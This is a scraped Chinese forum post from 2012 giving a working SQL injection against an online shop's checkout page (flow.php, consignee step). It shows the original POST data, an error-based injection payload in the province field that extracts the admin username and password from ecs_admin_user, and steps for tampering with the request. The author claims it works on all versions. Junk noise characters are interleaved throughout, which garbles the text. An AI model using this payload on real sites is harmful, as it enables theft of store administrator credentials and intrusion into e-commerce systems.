感谢欠杀的黑盒
& i7 v7 ~ B$ m) P$ _1 H- i
$ C6 o1 N' ~2 V! n" r
3 L: F- i9 j) }$ I把任意商品加入购物车在填写配送地址那一页,有地区选择
( o8 v7 P3 v/ h% [/ H1 i
. R4 P/ O+ M' Q0 P& V% t3 f& lflow.php?step=consignee&direct_shopping=1: d7 K2 D+ E; w: s0 p# R5 {! A
比如省选择安徽
$ A1 h$ ~/ x/ w. i ( L& m4 m; ^6 ]) f
其中POST数据如下
7 o$ L4 K# |2 Y( n; o
. a3 }% P8 D! t! g* K, |country=1&province=3&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=province=3( k$ ^3 ?0 u8 a9 E: J+ {
改成$ ^ C2 |/ c3 o8 y
% F" c3 C2 G0 Y; I% ]" {9 Bprovince=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #
0 q2 C6 @" V2 P6 K' I8 zps:详细的方法,用火狐tamper data插件……..即可改post内容…..
c# s; H9 v P, m2 s3 `, z( W
) U. _% X4 k4 M5 }先注册账户,随便选个商品进购物车,然后填地址,电话什么的,填好开始抓包,改包, \3 F* c. Z" A1 `
' [1 N! y8 y8 g: x& R
就会回显错误页面了。。。。
9 G$ j# o# g& i4 _" E5 ?. o : i! h4 r5 P5 `% h- y6 Q4 O. F
我自己没用这个日站过,就测试了一个最新版和老版本,均ok,所以写全版本,理论上应该是的
' \* }! s/ j6 D0 j |
发表于 2012-12-31 09:19:27
收藏
支持
反对